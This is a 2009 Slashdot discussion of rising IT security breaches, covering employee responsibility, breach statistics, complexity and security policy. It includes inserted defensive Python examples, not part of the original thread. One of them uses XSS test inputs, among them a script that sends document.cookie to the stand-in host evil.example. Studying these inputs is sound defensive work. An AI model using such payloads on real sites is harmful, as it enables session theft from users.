
IT Security Breaches Soar In 2009

kdawson posted more than 4 years ago | from the inside-jobs dept.

Security 65

slak11 quotes from a Globe and Mail article on the jump in corporate and government security breaches year-over-year. (The reporting is from Canada but the picture is probably much the same in the US.) "This does not seem to be all that newsworthy these days, since stories like this are appearing on a regular basis. The one detail I did like — that seems to break from the traditional 'hackers cause all the bad stuff' reporting — is the mention that everyday employees are a major cause of breaches. The recent Rocky Mountain Bank/Google story is a perfect example. As stated in the article: 'But lower security budgets aren't the only reason breaches tend to soar during tough economic times — employees themselves can often be the cause of such problems.' I figure this will be an ongoing problem until company management and employees accept their role in keeping company information safe. And IT people need to understand that regular employees are not propeller-heads like Slashdot readers, and to begin to implement technology and processes that average people can understand and use."


65 comments

Coincidence? (3, Funny)

Dyinobal (1427207) | more than 4 years ago | (#29586863)

Coincidence? That it's the same year Windows 7 was released? dun dun dun!

Re:Coincidence? (1)

CannonballHead (842625) | more than 4 years ago | (#29586963)

Was? I had no idea it was October 22nd already. [microsoft.com]

ladies, get your pussies ready! (-1, Offtopic)

Anonymous Coward | more than 4 years ago | (#29587369)

Our movie is nothing like The Hangover except in the vaguest plot descriptions, and in the most important way--humor--it's way, way better. Like, not even comparable. The worst jokes in our movie kill the best in The Hangover, even ignoring the fact that pretty much all the best lines were in the trailer.

Plus, I am super excited to see that movie do well. It proves the market for our concept--that hard R movies without stars, about guys and drinking are viable--and anything that movie can do at the box office, we can beat. Easily. It's like watching someone fight your opponent first, and you get to see exactly what you are in for.

If there do end up being a lot of comparisons, it will go poorly, but not for us. The Hangover is probably one of the best comedies of the last ten years, but all that means is that comedy has sucked for ten years. The days of being able to pass off dogshit like The Hangover as great comedy end on September 25th. We are going to sweep in out of nowhere and shake up the comedy world. The bar will be raised.

And if you doubt me, that's cool. Stand in line behind all the other doubters--the ones who said I couldn't be a writer, or my website couldn't be a book, or my book wouldn't be a best seller, or I couldn't write a movie, or I couldn't get that movie made, or I couldn't get the movie distributed, etc, etc, etc. They have been wrong every time in the past, and they will be wrong this time.

Re:Coincidence? (3, Funny)

frosty_tsm (933163) | more than 4 years ago | (#29587737)

Coincidence? That it's the same year Windows 7 was released? dun dun dun!

It's also the year in which Windows Vista adoption peaked.

Re:Coincidence? (2, Funny)

Korbeau (913903) | more than 4 years ago | (#29589281)

It's also the year in which Windows Vista adoption peaked.

I already adopted a Windows Vista and recommend everyone to do so - it's for such a good cause! For a couple hundred bucks they send you a round-framed picture of it. I have it on my fridge. Please, think of the poor Vistas struggling to live!

Re:Coincidence? (1)

selven (1556643) | more than 4 years ago | (#29600287)

It's also the year in which Kirill I [wikipedia.org] became the patriarch in Russia. Clearly the Russian Orthodox Church is responsible for this.

Re:Coincidence? (1)

CAIMLAS (41445) | more than 4 years ago | (#29590143)

More likely, it's a year where barely anyone has been hiring, and a lot of layoffs have been made. I was thinking it was bad last fall, but shit! This year I saw no more than 2 IT related postings locally from February until August. In 2008, I'd see 5-10 or so a month.

When your IT staff is at "skeleton" levels because you don't know what you're doing, you're going to reap the whirlwind. The first thing to go out the door is security vigilance, because it's usually the last thing that's given conscious thought (unless users are complaining about something specific, in which case it becomes your first thought).

Mafiaa and "terrorists" (4, Interesting)

religious freak (1005821) | more than 4 years ago | (#29586897)

The one thing I don't understand is, why don't we actually see MORE breaches in data security than we do now? I mean like real deal, big time, Italian Job / Oceans 11 type stuff. Yeah a little crime here and there, ok. But with IT pervading every major monetary transaction, people in the know could essentially steal an infinite amount of money.

Really, even if you amalgamate enough talent to become 1/4 of a state actor in terms of budget / knowledge, you could make all kinds of money, XSS, SQL injection, social engineering, etc. I'm really surprised we haven't seen a major IT heist yet.

Re:Mafiaa and "terrorists" (5, Insightful)

wigaloo (897600) | more than 4 years ago | (#29587001)

The one thing I don't understand is, why don't we actually see MORE breaches in data security than we do now? I mean like real deal, big time, Italian Job / Oceans 11 type stuff. Yeah a little crime here and there, ok. But with IT pervading every major monetary transaction, people in the know could essentially steal an infinite amount of money.

What we learned during the 2008 financial crisis is that there are plenty of ways for crooks to steal an infinite amount of money legally.

Re:Mafiaa and "terrorists" (1)

NoYob (1630681) | more than 4 years ago | (#29587057)

The one thing I don't understand is, why don't we actually see MORE breaches in data security than we do now? I mean like real deal, big time, Italian Job / Oceans 11 type stuff. Yeah a little crime here and there, ok. But with IT pervading every major monetary transaction, people in the know could essentially steal an infinite amount of money.

What we learned during the 2008 financial crisis is that there are plenty of ways for crooks to steal an infinite amount of money legally.

...and be lauded for it.

Re:Mafiaa and "terrorists" (-1, Troll)

Anonymous Coward | more than 4 years ago | (#29587725)

Sigh. It seems that no matter what happens here there is always an appropriate Dilbert [imageshack.us] strip.

Re:Mafiaa and "terrorists" (1)

MichaelSmith (789609) | more than 4 years ago | (#29587633)

Two possibilities come to mind:

  • People smart enough to pull that kind of thing off know that the cops really aren't stupid and that spending time in jail with really dumb people would be worse for them than for normal dumb crooks.
  • Victims of crimes of this nature don't want their investors/customers/competitors to know they have been ripped off so they try not to advertise the fact that they have been ripped off.

Re:Mafiaa and "terrorists" (1)

frosty_tsm (933163) | more than 4 years ago | (#29587757)

Two possibilities come to mind:

  • People smart enough to pull that kind of thing off know that the cops really aren't stupid and that spending time in jail with really dumb people would be worse for them than for normal dumb crooks.
  • Victims of crimes of this nature don't want their investors/customers/competitors to know they have been ripped off so they try not to advertise the fact that they have been ripped off.

Also, people that smart tend to have other options with better risk to profit ratios.

Re:Mafiaa and "terrorists" (0)

Anonymous Coward | more than 4 years ago | (#29587795)

Yeah a little crime here and there, ok. But with IT pervading every major monetary transaction, people in the know could essentially steal an infinite amount of money.

Perhaps you were not paying attention to the US bailouts, looks like a major theft to me!!
Captcha is "veered" seems oddly appropriate to me.

Re:Mafiaa and "terrorists" (1)

FreakyGreenLeaky (1536953) | more than 4 years ago | (#29591513)

I'm really surprised we haven't seen a major IT heist yet.

Probably because these events are rarely made public. The goodwill/brand/image damage of these things becoming publicly known often far outweighs the value of the actual theft.

Re:Mafiaa and "terrorists" (1)

hesaigo999ca (786966) | more than 4 years ago | (#29592513)

Probably because ie- like in entrapment with the Chinese bank heist, or oceans 11 or 12 or 13, the Casinos have their own security in place and are always up to date with all technologies, same with overseas banks of a certain level.
Banks here like td, or scotia are small in comparison, and don't want to invest money in security.

The TJX problems are the same, a big store like TJX seems to have shortfalls, where someone like Le Chateau have vmware in use, needing the best of the best to keep the networks going and would never be subject to a usb key infiltration because they disabled all the on board usb channels... TJX might have used third party vendors and such...like Dell to preconfigure all their hardware, hence the lack of proper security.

Oh no! (0)

Anonymous Coward | more than 4 years ago | (#29586997)

nothing quite like a security breach.

Re:Oh no! (2, Interesting)

plover (150551) | more than 4 years ago | (#29587453)

Oh no! This is nothing like fact-based reporting, either.

Look at the graph on the banner of OSF Dataloss [datalossdb.org] . That banner, right across the top, shows the number of reported incidents, month by month, since Feb 2007. The 2007 average seems to be in the mid-40s. The 2008 average seems to be about 60 per month. The 2009 bar graph is steadily sloping downwards, starting from a high of 61 incidents in February dropping down steadily to 23 last month and 16 this month.

To be a bit more factual, you can visit the statistics. [datalossdb.org] That shows the progression from 2005-2009 looking like this:
2005 140
2006 530
2007 484
2008 703
2009 331

Nothing in the statistics even remotely seems as bad as last year, and this year's pace seems to be trending towards even fewer breaches than 2006's level.

I call shenanigans on this report!

Re:Oh no! (0)

Anonymous Coward | more than 4 years ago | (#29587643)

Could be shenanigans, but they're using different metrics. OSF uses media reports to search for breaches that have been made public whereas TFA conducted a survey of "more than 600 Canadian IT security professionals."

Re:Oh no! (1)

plover (150551) | more than 4 years ago | (#29587787)

Could be shenanigans, but they're using different metrics. OSF uses media reports to search for breaches that have been made public whereas TFA conducted a survey of "more than 600 Canadian IT security professionals."

After I posted it, I figured that if they weren't looking at 2009 (because most reporting is done on an annual basis), 2008 does indeed look pretty terrible by comparison to the rest of the years. Although TFA does say that in 2009 the security professionals are reporting 11 incidents per organization compared to 3 per org in 2008.

So, are the Canadian corporations better at hiding breaches from the public than the OSF indicates? Are the "professionals" overreporting and including counts of attempted breaches, like drive-by WEP attacks that go nowhere, or phishing emails, or viruses? Or is this a real count of actual breaches that caused a loss of valuable data, and they're just not telling us?

Re:Oh no! (1)

cbiltcliffe (186293) | more than 4 years ago | (#29608603)

A few reasons:

1. Canada has no mandatory notification law, so they frequently won't be published.
2. People who are still using WEP for their wireless security aren't going to be looking for attempted attacks.

This is probably a worst possible case scenario, like "all the data that could have been breached, but we don't necessarily know it was", but I would think it's probably realistic.

Re:Oh no! (2, Insightful)

lysergic.acid (845423) | more than 4 years ago | (#29587773)

OSF Dataloss seems to be counting the number of data breaches (i.e. database of customer info being leaked, millions of credit card numbers being stolen, etc.), whereas this article refers to security breaches in general, not just those that affect personal privacy. Also, the article seems to be based on Canadian statistics, as well as going by the cost of damages rather than the number of breaches that occurred.

I mean, if in 2008, there were 703 breaches, each only making off with $10~20k of data on average, whereas the 331 breaches this year average $100k in data, then that's still a huge increase in the severity of the security breaches.

Simply counting the number of breaches on record just doesn't paint the full picture.

Re:Oh no! (2, Informative)

plover (150551) | more than 4 years ago | (#29587963)

Aha, I found that they have "number of records" metrics, too, as long as you're willing to harvest them out of their reports.

2009 YTD:
Total Incidents: 330
Total Records Affected: 138,772,156

2008:
Total Incidents: 703
Total Records Affected: 85,843,506

2007:
Total Incidents: 484
Total Records Affected: 165,184,031

2006:
Total Incidents: 530
Total Records Affected: 51,142,868

2005:
Total Incidents: 140
Total Records Affected: 55,988,256

So 2009 is indeed a "severe" year in terms of records lost. Again, though, these are totals of all reportedly lost data, regardless of how the data went missing. A backup tape with 100,000 records lost in a dumpster counts equally with a hacker stealing 100,000 credit cards from a web site, even though one loss clearly places the data at a higher risk for fraudulent use than the other.
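The comparison plover draws above (incident counts versus records affected, and a lost tape counted the same as a remote compromise) is easy to get wrong when the numbers are read off a banner graph. The following is an added example, not code from the thread or from DataLossDB, that aggregates a DataLossDB-style incident list per year and splits records by breach type. The rows in SAMPLE_INCIDENTS are constructed for illustration and describe no real incidents; the breach-type labels follow the distinction made in the post, not DataLossDB's own taxonomy.

```python
"""
Added example: aggregate a DataLossDB-style incident list per year so that
incident count and records lost can be compared side by side, and so that a
single very large compromise is visible rather than hidden inside a total.
Sample rows are constructed for illustration and describe no real incidents.
"""
from collections import defaultdict
from statistics import median

# Constructed sample: (year, breach type, records affected).
SAMPLE_INCIDENTS = [
    (2008, "lost_tape", 100_000),
    (2008, "hack", 1_200),
    (2008, "hack", 3_500),
    (2008, "stolen_laptop", 18_000),
    (2009, "hack", 130_000_000),   # one very large compromise dominates the year
    (2009, "lost_tape", 100_000),
    (2009, "stolen_laptop", 9_000),
]


def summarize_by_year(incidents):
    """Return {year: {"incidents", "records", "mean", "median"}} for the list.

    Mean and median are both reported: when one incident carries most of the
    year's records, the mean moves a lot while the median barely changes,
    which is the distinction a pure incident count cannot show.
    """
    per_year = defaultdict(list)
    for year, _kind, records in incidents:
        per_year[year].append(records)
    summary = {}
    for year, counts in sorted(per_year.items()):
        summary[year] = {
            "incidents": len(counts),
            "records": sum(counts),
            "mean": sum(counts) / len(counts),
            "median": median(counts),
        }
    return summary


def records_by_type(incidents, year):
    """Records lost in `year`, split by breach type.

    A backup tape lost in a dumpster and a web server compromised remotely
    put the same record count at very different risk of fraudulent use, so
    they should not be silently summed into one figure.
    """
    out = defaultdict(int)
    for y, kind, records in incidents:
        if y == year:
            out[kind] += records
    return dict(out)


if __name__ == "__main__":
    for year, s in summarize_by_year(SAMPLE_INCIDENTS).items():
        print(f"{year}: {s['incidents']} incidents, {s['records']:,} records, "
              f"mean {s['mean']:,.0f}, median {s['median']:,.0f}")
    print(records_by_type(SAMPLE_INCIDENTS, 2009))
```

Run against the constructed rows, 2009 has fewer incidents than 2008 but roughly a thousand times the records, and the per-type split shows that almost all of them come from one remote compromise. Reading the same table as "incidents per year" alone would rank 2008 as the worse year.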

Re:Oh no! (1)

plover (150551) | more than 4 years ago | (#29588001)

I just realized there might be a positive spin to their numbers as well. Because security awareness has been at the current peak for only a short while (it's really taken off in the last two or three years), it's possible that they're reporting higher numbers of attacks because they now have the tools and monitors in place to detect the higher numbers. Perhaps hacking is not nearly as bad now as it was before, it's just that they didn't know they were being hacked before, and now they do.

Propeller-heads (5, Insightful)

causality (777677) | more than 4 years ago | (#29587067)

And IT people need to understand that regular employees are not propeller-heads like Slashdot readers, and to begin to implement technology and processes that average people can understand and use.

You have to love the implication that IT staff purposefully choose the most arcane implementation for the hell of it, or that they enjoy the support calls they receive when users have a hard time with a system. Sometimes what you are doing is inherently complex, and some ability to deal with complexity is necessary. The way I see it, there are two broad approaches to the problem of "implement[ing] technology and processes that average people can understand and use." One is to simplify those technologies and processes. The other is to increase the understanding of the users, or for the users to increase their own understanding.

For some reason, most discussions like this seem to have this unstated assumption that the former approach is the only possible one. I'd like to see more of a middle-ground solution. I like Einstein's saying about how things should be made as simple as possible, but no simpler. Once that is done, if the users still find the systems and processes to be too complex, and their job requires the ability to handle same, then I would conclude that this means they are not qualified for their job and need to be replaced by someone with more understanding. Is that really such a scary conclusion that we must perform all sorts of musings and mental gymnastics to avoid it? Because I certainly believe that people can improve if it is expected of them, if there are not infinite excuses for their shortcomings. For that reason, I don't believe that regarding users who can't handle good systems as unqualified would result in tremendous turnover within a company. I think it would result in more savvy users, even if only to avoid being fired. It would certainly help to disabuse people of this mentality that basic competency is only for nerds, hardcore geeks, and experts.

Re:Propeller-heads (0)

Anonymous Coward | more than 4 years ago | (#29587455)

Thanks to Microsoft, people have been taught that you can run an operating system, manage a database of information, and even program without knowing what the hell they are doing.

Re:Propeller-heads (1)

Sulphur (1548251) | more than 4 years ago | (#29588183)

We can't solve problems by using the same kind of thinking we used when we created them. Einstein

Re:Propeller-heads (1)

myowntrueself (607117) | more than 4 years ago | (#29587619)

You have to love the implication that IT staff purposefully choose the most arcane implementation for the hell of it

I know for a fact that many programmers and engineers do indeed *purposefully* make things more complex than they need to be.

People like this enjoy a challenge. Writing code that's hard for others to understand (or themselves in a few weeks time) gives them a sense of accomplishment.

People like this enjoy the careful crafting of complexities layered upon complexities.

Myself, I recite 'keep it simple, stupid' to myself over and over. It's my mantra.

Cleaning up after someone else's excessive overcomplification of something that could have been done simply and cleanly is the bane of my existence.

Re:Propeller-heads (1, Funny)

Anonymous Coward | more than 4 years ago | (#29587641)

Cleaning up after someone else's excessive overcomplification of something that could have been done simply and cleanly is the bane of my existence.

hey, shut up asshole! we keep you employed!!

Re:Propeller-heads (3, Insightful)

plover (150551) | more than 4 years ago | (#29587749)

But "simple" does not mean "secure". Yes, simple is easier to verify, but you can write simple, clean code and still get hit with a security incident.

Code that is simple and secure today also doesn't mean that it will be secure tomorrow, once the next exploit is created and discovered. How long ago was it before javascript existed? Nobody cared if you put <script> tags in your comments, because browsers didn't even know the keyword "script". Suddenly browsers started appearing that supported this tag, and people got creative when posting comments, including cute scripts to animate their signatures. Then XSS attacks were discovered and became all the rage, and perfectly secure web sites around the globe suddenly had a new threat model that became their responsibility to clean up.

You can review simple code all day long and assure yourself that it will do what it's supposed to do. But it's very, very hard to review code to ensure that it won't do something bad, especially when you don't have tomorrow's definition for "bad" to review against!
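plover's point above is that a comment renderer which was perfectly safe before browsers knew the word "script" became vulnerable without a single line changing. The following is an added example, not code from the thread, that puts a blocklist renderer next to an output-encoding renderer and runs both over constructed comment bodies. The blocklist only knows the one payload its author had seen; output encoding removes the browser's ability to see a tag or attribute boundary in user data at all, which is why it holds up against payloads that did not exist when the code was reviewed. The COMMENTS strings are constructed test inputs, and evil.example is a placeholder host.

```python
"""
Added example: why stripping "<script>" from user comments is fragile, and what
contextual output encoding does instead. Comment bodies are constructed inputs.
"""
import html
import re

# Constructed comment bodies a forum might receive (not real posts).
COMMENTS = [
    "Nice article <b>well done</b>",
    "<script>document.location='http://evil.example/?c='+document.cookie</script>",
    "<SCRIPT>alert(1)</SCRIPT>",                 # same payload, different case
    '<img src=x onerror="alert(1)">',            # no <script> tag at all
    '<a href="javascript:alert(1)">link</a>',    # payload lives in a URL attribute
]

# The one pattern the blocklist author knew about.
_SCRIPT_TAG = re.compile(r"<script>.*?</script>")


def render_blocklist(comment):
    """Fragile approach: delete literal <script>...</script>, insert the rest raw.

    Everything the author had not seen yet (upper case, event handlers,
    javascript: URLs) passes straight through to the browser.
    """
    return f"<p>{_SCRIPT_TAG.sub('', comment)}</p>"


def render_encoded(comment):
    """Output encoding for HTML element content.

    html.escape with quote=True rewrites < > & " and ' so the HTML parser
    never sees a tag or attribute boundary inside user data. This is the
    right encoding only for element content and quoted attribute values;
    URL, JavaScript and CSS contexts each need their own encoder.
    """
    return f"<p>{html.escape(comment, quote=True)}</p>"


def looks_like_markup(rendered_body):
    """Crude check: does the rendered comment still contain raw angle brackets?"""
    inner = rendered_body[len("<p>"):-len("</p>")]
    return "<" in inner or ">" in inner


if __name__ == "__main__":
    for c in COMMENTS:
        print("blocklist:", render_blocklist(c), "| markup leaks:",
              looks_like_markup(render_blocklist(c)))
        print("encoded:  ", render_encoded(c), "| markup leaks:",
              looks_like_markup(render_encoded(c)))
```

The blocklist catches exactly one of the four hostile inputs; the encoder neutralises all of them, including ones nobody had thought of when it was written. The cost is that the encoder also neutralises the harmless `<b>` in the first comment, which is the usual trade: if users must be allowed some markup, that is a job for a real HTML sanitiser with an allowlist of tags and attributes, not for a regex.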

Re:Propeller-heads (1)

causality (777677) | more than 4 years ago | (#29588185)

You have to love the implication that IT staff purposefully choose the most arcane implementation for the hell of it

I know for a fact that many programmers and engineers do indeed *purposefully* make things more complex than they need to be.

People like this enjoy a challenge. Writing code that's hard for others to understand (or themselves in a few weeks time) gives them a sense of accomplishment.

People like this enjoy the careful crafting of complexities layered upon complexities.

Myself, I recite 'keep it simple, stupid' to myself over and over. It's my mantra.

Cleaning up after someone else's excessive overcomplification of something that could have been done simply and cleanly is the bane of my existence.

Then I would say that they are not being challenged enough. The ability to produce something that is simple, robust, elegant, and maybe even beautiful and especially the mentality that can appreciate these things is so significant of a challenge that most end up failing a test that they did not know they were taking, so to speak. That quality may never become common-as-dirt because what sort of person you are, which values you possess, and what attitude you have towards life in general has a lot to do with whether you can appreciate the simple or whether you have a need to prove something. That this "trait" be recognized and identified is a good first step towards cultivating it in the workplace.

It really is a win-win even if you must look at it in mundane terms of marketing. The organization benefits when IT runs smoothly and its systems are robust. IT benefits when there is no needless time pressure brought on by excess complexity that is only present to soothe someone's fevered ego. The only things holding back change are institutional inertia and lack of the willingness to perform this sort of introspection. Both are surmountable.

Dude... (1)

endus (698588) | more than 4 years ago | (#29589023)

Experience is the reason that the former is always assumed to be the only approach. Users don't give a fuck about understanding more or learning more or taking any responsibility at all for the security of the IT infrastructure. It often seems, in fact, that the more critical the position they hold in regards to access to sensitive information (doctors, lawyers, etc.) the more resistant they are to learning about IT or doing their part to keep the organization secure.

The ONLY solution is the former. As the population of workers is replaced by people who grew up with IT there will be fewer extreme examples of people totally unwilling to do anything at all, but in the end the user mentality remains the same. The ONLY solution is to simplify the solutions and force them, via policy, to accept "the best we can do".

I see this in every aspect of my job. Tell the sys admin that his server is off the wire because it was attempting to infect thousands of other critical servers and possibly even equipment which is even more critical and all he does is complain to his director that you're being a dick and not letting his box, that he failed to patch for 5 years, back on the wire...and that's an IT person. Don't get me started on explaining to the high-muckity-muck that their VPN connected laptop was the source of a worm which infected 200 computers with something they downloaded from a porn site.

The notion that basic competency is only for nerds, hardcore geeks, and experts is rooted firmly in the fact that almost no one is competent or even somewhat intelligent. Most people are stupid as fuck. They manage to do their job like a monkey can learn to press a button and get a treat, but try and teach that same monkey to type a password and get a treat and you're officially well past the point of diminishing returns.

Re:Dude... (3, Insightful)

rtb61 (674572) | more than 4 years ago | (#29589799)

Easiest solution to your problem, parallel networks. An internal secure network, accounting, payroll, banking, data management, cad, cam, publishing etc. and an external network email and internet access. Lock down the internal network, tight, no internet access, no portable media, data is either input at the keyboard or uploaded at the IT office after it is reviewed and scanned.

External network, let the children play and create a USB reboot and rebuild stick for each notebook. You will be a whole lot less frustrated and the children will be happy as they get to play without controls and, by children I do mean the executive pool. Keep it simple internal wired and external wireless, in office try to use infra-red for wireless, it is more restricted and safer.

This way only one machine at a time gets infected on the external network and the infection is always from the net rather than internal. Internal a desktop/terminal, external cheap netbooks/smartbook basically a throw away and in effect an extension of a mobile phone.

Best thing about this, passwords not a problem, unless they break into the specific office to gain access to the specific files than they are out of luck and the server room itself can be fully secured and alarmed, basically a vault.

I.T. IS COMPLICATED, GET USED TO IT! (3, Insightful)

uslurper (459546) | more than 4 years ago | (#29587173)

" And IT people need to understand that regular employees are not propeller-heads like Slashdot readers, and to begin to implement technology and processes that average people can understand and use."

This is exactly the attitude that causes insecure environments. Security IS complicated. Accounting IS complicated. Networking IS complicated. PC's ARE complicated. Fuck people realize that I.T. IS COMPLICATED. Give your IT Department the tools and authority to run their department the way it needs to be done.

Re:I.T. IS COMPLICATED, GET USED TO IT! (2, Insightful)

jklovanc (1603149) | more than 4 years ago | (#29587723)

Yes, it is complicated. It is also understandable if enough information is given to the users. The standard IT responses of "it's company policy" and "just do it" do not cut it in an intelligent workplace. Sure you want users to follow the rules but giving real reasons why might just raise compliance.

Re:I.T. IS COMPLICATED, GET USED TO IT! (0)

Anonymous Coward | more than 4 years ago | (#29589305)

"But I just figured since (stupid premise) (faulty logic) (company policy) it would be just fine, as long as I was careful."

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

CAIMLAS (41445) | more than 4 years ago | (#29590179)

The alternative to "it's company policy" is explaining Active Directory/UAC/ACLs to them, and they feel like you're talking over their heads/insulting them. Or trying, in some sort of perverted fashion which doesn't actually make all that much sense - and then they feel like you're condescending/insulting them.

When your average IT worker has (say) an IQ of 120, which is 10-15 points higher than the average office worker (best case scenario!), you're not working in an "intelligent workplace". Most workplaces are not "intelligent". And even in an "intelligent" work place (say, an accounting firm or a law firm), the chances are high that the domain of knowledge is so far divorced from their reality that you might as well speak in reverse-polish notation Sanskrit.

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

jklovanc (1603149) | more than 4 years ago | (#29590857)

You do not have to explain the technology; you have to explain the consequences.

For example; To explain the need for strong passwords and not writing them down on a piece of paper next to your computer. "If someone figured out or found your password they could log into our system and as far as the system is concerned they would be you. Do you really want to be blamed for something someone else did?"

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

BVis (267028) | more than 4 years ago | (#29592331)

For example; To explain the need for strong passwords and not writing them down on a piece of paper next to your computer. "If someone figured out or found your password they could log into our system and as far as the system is concerned they would be you. Do you really want to be blamed for something someone else did?"

No.

"Use a strong password and don't write it down, or else you'll get fired."
"Don't plug your own USB key into a company computer, or else you'll get fired."
"Don't surf porn sites on your company laptop, or else you'll get fired."
"Don't attempt to circumvent company security policy, or else you'll get fired."

I bet you'll find security is a lot better after that, or after one or two idiots is made an example of by being shown the door in front of all his/her coworkers. The only way to enforce even a 'reasonable' security policy (strong passwords, no USB keys/boot CDs, no unauthorized equipment on company networks, don't be stupid) is to have an AUP and give it some real teeth. (And yes, "don't be stupid" is a valid part of a 'reasonable' security policy. If someone is stupid, they can work for someone else.)

Re:I.T. IS COMPLICATED, GET USED TO IT! (0)

Anonymous Coward | more than 4 years ago | (#29592993)

(And yes, "don't be stupid" is a valid part of a 'reasonable' security policy. If someone is stupid, they can work for someone else.)

You're asking way too damned much. You're also setting yourself up for a fall the first time the CEO comes in asking you to reimage their corporate laptop which got infected while they were surfing porn from Starbuck's that morning (true story).

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

jklovanc (1603149) | more than 4 years ago | (#29600169)

This is a perfect example of why IT rules do not get followed. Even firing a few people for infraction probably would not work. Most people would think "No one would get fired for such a minor issue. I bet that was just an excuse. There must be some other reason." Even if it did work, the only people who would be affected by it would be in the same office as the person fired. Possibly effective for a single office company; not so good for a large company (or are you suggesting firing someone from every office before the message gets through). What is wrong with giving out a little extra information so that people understand the reason behind the rule?

"Use a strong password and don't write it down, or someone can masquerade as you, you will be blamed for their actions and you'll get fired."

"Don't plug your own USB key into a company computer, or our network could be infected by a virus costing thousands of $ and you'll get fired."

"Don't surf porn sites on your company laptop, or we could be sued for sexual harassment costing us thousands of $ and you'll get fired."

Would you rather have users think "stupid rule, screw it" or "Now I understand, I better follow it".

BTW, "don't be stupid" is not a valid AUP clause. An AUP is a legal document that will be referred to in any wrongful dismissal suit. "Don't be stupid" is vague and open to interpretation and would not hold up in court. It relies on the company being able to prove that the employee knew something was stupid and did it anyway; extremely difficult at best.

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

CAIMLAS (41445) | more than 4 years ago | (#29599959)

That's rarely something which needs to be described, and in most small environments, it's usually something of marginal consequence.

The biggest concern for security breaches is malware and the associated data harvesting. When you've got users running as Administrator, it's a bit of a problem. The users will get into pissing fights when you've got to revoke their ability to install "screensavers" and the like.

Re:I.T. IS COMPLICATED, GET USED TO IT! (0)

Anonymous Coward | more than 4 years ago | (#29587765)

OK, so what about Group Policy and things like BeyondTrust? Our experts can never seem to explain to us exactly why a given user is prevented from doing something, nor can they tell us how to diagnose a problem ourselves. Is that the users' problem or Group Policy, or BeyondTrust, or IT?

Seriously, I want to know, because no one who manages the policy stuff can explain it.

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

endus (698588) | more than 4 years ago | (#29588939)

The comments here are clearly full of security pros. Awesome.

I totally agree with you. I don't think it SHOULD be that way or that it NEEDS to be that way...but it is that way, especially today. We're so anxious to adopt IT and let it permeate every aspect of every organization but we're completely unwilling to deal with the consequences and mitigate the risks. Upper management is a bunch of balloon heads who don't know the first god damn thing about computers or security so when it comes down to "gosh we really need to have users type a password for this or it could be really bad" the answer is always "duhhhhhhhhhhh that sounds hard...forget about it".

Security (4, Insightful)

oldhack (1037484) | more than 4 years ago | (#29587207)

Security is a lot like IT, but much more so. It's a waste of money until shit hits the fan. 5 minutes later, it becomes a waste of money again. But it's difficult to judge how close you are to the shit-blade collision point, though, because in the end it's an effort to mitigate breach, not a guarantee, and the news stories that do pop up tend to be sensationalistic and don't help the assessment.

Re:Security (1)

PRMan (959735) | more than 4 years ago | (#29587807)

Ah, but what most IT people do NOT realize, is that the more you increase security beyond a reasonable point, the MORE likely you are to have a breach, because the only way people can do their work is to go around your security by using USB flash drives and burning CDs.

Most IT professionals seem to have a hard time with REASONABLE security, either being too lax and having virtually no security (as with some of the stories we have heard) or being so restrictive that nobody can do their work and resorts to flash drives, laptops and CDs (the rest of the stories we have heard).

Re:Security (1)

causality (777677) | more than 4 years ago | (#29588407)

Ah, but what most IT people do NOT realize, is that the more you increase security beyond a reasonable point, the MORE likely you are to have a breach, because the only way people can do their work is to go around your security by using USB flash drives and burning CDs.

Things which do not correctly balance opposing forces or opposing goals are much more likely to fail and this is a universal principle, applicable everywhere. Various sages and philosophers from many different cultures have noted this principle and its implications for thousands of years, and probably longer than that. The problem, then, is that people do not understand principles like this and when they specialize, they memorize procedures and inventories of knowledge and methods of problem solving but they do not recognize the general principles that still apply to their specialty. Personally I believe this is because they get so caught up in what they do that everything becomes immediate and they lose the ability to mentally take a step back and maintain their objectivity.

Motivation (3, Insightful)

whoever57 (658626) | more than 4 years ago | (#29587521)

... employees themselves can often be the cause of such problems.' I figure this will be an ongoing problem until company management and employees accept their role in keeping company information safe

I figure it will continue to be a problem until company management provides the appropriate motivation and training to employees to keep company data safe. This won't happen until management also has the appropriate motivation. Did anyone in management get fired over the Rocky Mountain Bank/Google incident? How much has this cost the bank?

Re:Motivation (1)

drinkypoo (153816) | more than 4 years ago | (#29591963)

THIS is the absolute truth. The problem is the lack of accountability. I personally think that it is enough to fine companies who do this kind of thing to the point where they are unprofitable. Throw the fines into the general pool, and let the taxpayers keep some more of their money. You'll see the corporations go looking for more responsible CEOs &c in no time.

...the same in the US. (1)

mevets (322601) | more than 4 years ago | (#29587525)

Yes, except it will be pictures, with arrows, and small words arranged as digestible catch phrases. Perhaps a pie chart.

A new law in security. (2, Insightful)

Polarina (1389203) | more than 4 years ago | (#29587673)

Everything that can be hacked, will be hacked. If not in your lifetime, then in mine.

There is no jump (-1)

girlintraining (1395911) | more than 4 years ago | (#29587805)

This "jump" you're seeing has nothing to do with an increase in the problem, but rather an increase in the use of insecure technologies. Most crimes are crimes of opportunity, and IT security breaches are no exception. The reason for the uptick is an increase in attack surface area and the fact that a lot more people are slipping into poverty. An increase in unemployment and poverty has always resulted in an increase in the crime rate.

From My Experience (2, Interesting)

Penguinshit (591885) | more than 4 years ago | (#29587831)

The best way is to remove the users' ability to do damage by enforcing tight GPOs, blocking access to certain types of websites, denying the ability to install software without your participation, blocking certain ports at the demarc (ingress and egress), enforcing automatic patching and virus data file updates, etc.

It seems draconian but once they get used to not going to Facebook or eBay or playing Elf Bowling during work the whining settles down. Oddly enough most of the grumbling comes from the PhDs (who should fucking well know better) and not the administrative staff.

User education helps but only to a narrow limit and degrades fast. You need to make internal security breaches an overt hostile act, which in normal commercial companies is extremely hard to prevent without also retarding the ability to get work done.

Security Always Loses (2, Insightful)

endus (698588) | more than 4 years ago | (#29588901)

"I figure this will be an ongoing problem until company management and employees accept their role in keeping company information safe."

Exactly. I suppose it's not that surprising that everyone wants all the benefits of IT without any of the responsibility, given that a solid 90% of people are just too fucking stupid to understand that it even HAS consequences, but the willful disregard for protecting customers'/patients' info is just pathetic. You work in the medical industry and you see that doctors and nurses and sysadmins just don't give a fuck about protecting their patients' identities and privacy, regardless of how small an inconvenience they face.

